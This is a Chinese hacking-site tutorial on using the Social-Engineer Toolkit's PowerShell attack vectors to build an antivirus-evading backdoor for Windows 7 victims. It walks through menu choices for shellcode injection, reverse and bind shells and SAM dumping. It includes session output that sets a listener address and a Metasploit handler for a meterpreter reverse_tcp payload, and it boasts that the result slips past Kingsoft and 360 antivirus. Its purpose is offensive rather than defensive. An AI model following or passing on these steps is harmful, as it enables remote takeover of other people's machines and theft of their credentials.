热门关键字:   木马编程 加密破解 黑客编程

免杀绕过Windows7 Powershell(Bypassing using Powershell)

发布时间:2018-10-31 16:32文章来源:未知文章作者: 点击次数:
摘要:Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示

Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。
使用 Windows PowerShell,您可以很方便地从以交互方式键入命令过渡到创建和运行脚本。您可以在 Windows PowerShell 命令提示符下键入命令以找到可执行任务的命令。随后,可将这些命令保存到脚本或历史记录中,然后将其复制到文件中以用作脚本。
识别你即将使用的Provider 通过识别PowerShell里安装的Provider,你就可以了解默认安装下PowerShell提供了那些能力。 Provider可以使用一种简单的访问方式,暴露位于不同储存位置的数据。就像是浏览不同磁盘上的目录结构一样简单。 Provider把不同的信息存放位置,表示成“驱动器”-目录这种结构,这样很容易被用户所理解。就像我们要访问一个位于D盘的WIN32目录下的SETUP.exe文件,我们要通过浏览器,单击D盘的图标,然后选择WIN32目录并双击一样,如果我们要访问位于“注册表”的数据,那么我们也只需要简单地通过Set-Location命令,来到到“REGISTRY”这个“驱动器”,然后用GET-CHILDITEM命令获取其子数据就行了。

Bsides 安全大会上,自信的胖子大卫-啃你爹SET的作者展示了一些新的绕过杀毒的办法using Powershell

更新set

root@Dis9Team:/pen/set# svn update

进入SET之后 首先选择 1) Social-Engineering Attacks 然后选择 10) Powershell Attack Vectors

 

 免杀绕过Windows7 Powershell(Bypassing using Powershell)

到这里选择door的类型

   1) Powershell Alphanumeric Shellcode Injector
   2) Powershell Reverse Shell
   3) Powershell Bind Shell
   4) Powershell Dump SAM Database

选择1吧 1) Powershell Alphanumeric Shellcode Injector

 

 

 免杀绕过Windows7 Powershell(Bypassing using Powershell)

然后等待他编码,SET向来都是32 64 通吃

set:powershell>1
set> IP address for the payload listener: 5.5.5.2
[*] Prepping the payload for delivery and injecting alphanumeric shellcode...
Enter the port number for the reverse [443]: 
[*] Generating x64-based powershell injection code...
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection attack and is encoded to bypass execution restriction...
set> Do you want to start the listener now [yes/no]: : yes
set:powershell> Select x86 or x64 victim machine [default: x64]:x64
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`


       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 914 exploits - 527 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops
       =[ svn r15684 updated 9 days ago (2012.07.26)

Warning: This copy of the Metasploit Framework was last updated 9 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:

https://community.rapid7.com/docs/DOC-1306

[*] Processing reports/powershell/powershell.rc for ERB directives.
resource (reports/powershell/powershell.rc)> use multi/handler
resource (reports/powershell/powershell.rc)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (reports/powershell/powershell.rc)> set lport 443
lport => 443
resource (reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (reports/powershell/powershell.rc)> exploit -j
[*] Exploit running as background job.
msf  exploit(handler) > 
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...

生成的后门保存在这里

root@Dis9Team:/pen/set/reports/powershell# pwd
/pen/set/reports/powershell
root@Dis9Team:/pen/set/reports/powershell# ls
powershell.rc  x64_powershell_injection.txt  x86_powershell_injection.txt
root@Dis9Team:/pen/set/reports/powershell# cat x64_powershell_injection.txt 
..............
--------无视----
root@Dis9Team:/pen/set/reports/powershell# 

下面选择社和你系统的运行 X86 OR X64

免杀绕过Windows7 Powershell(Bypassing using Powershell)

运行之后金山 360 无压力

免杀绕过Windows7 Powershell(Bypassing using Powershell)


References
http://www.secmaniac.com/files/PowerShell_Defcon.pdf
http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.html
http://www.exploit-monday.com/2011/11/powersyringe-powershell-based-codedll.html
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
http://www.obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html
http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx

上一篇:使用Metasploit制作DEB包木马与后门
下一篇:php shell 超强免杀工具

热点推荐